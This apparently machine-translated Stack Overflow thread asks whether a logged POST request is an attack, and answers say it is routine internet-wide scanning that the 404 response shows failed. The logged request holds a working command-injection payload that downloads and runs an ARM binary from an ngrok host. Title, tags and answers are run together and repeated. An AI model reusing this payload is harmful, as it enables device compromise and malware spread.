Security 你能证实我这个奇怪的帖子请求是一种网络攻击吗?
今天我打开了一个网站,它的唯一目的就是分享信息。后端没有插入数据库或不知道对其进行身份验证。然而,当我查看日志时,我注意到这个请求:Security 你能证实我这个奇怪的帖子请求是一种网络攻击吗?,security,post,cgi,Security,Post,Cgi,今天我打开了一个网站,它的唯一目的就是分享信息。后端没有插入数据库或不知道对其进行身份验证。然而,当我查看日志时,我注意到这个请求: POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/ar
POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
提前感谢,致以最诚挚的问候无需担心。这是一种攻击,但不是针对您的特定站点,而是扫描互联网的大部分以查找特定漏洞。 服务器以404响应这一事实意味着它不包含易受攻击的页面
这将发生在任何接触到公共互联网的网站上,并被视为背景噪音的一部分。无需担心。这是一种攻击,但不是针对您的特定站点,而是扫描互联网的大部分以查找特定漏洞。 服务器以404响应这一事实意味着它不包含易受攻击的页面
这将发生在任何接触到公共互联网的网站上,并被视为背景噪音的一部分。我在我的web服务器上也注意到了同样的请求。 以下是有关此次攻击的更多信息:
我在我的web服务器上也注意到了同样的请求。 以下是有关此次攻击的更多信息:
你好!为了支持未来的SO社区成员,最好从您共享的web资源中共享最相关的信息。有时,我们在这里共享的链接会失效。你好!为了支持未来的SO社区成员,最好从您共享的web资源中共享最相关的信息。有时,我们在这里共享的链接会失效。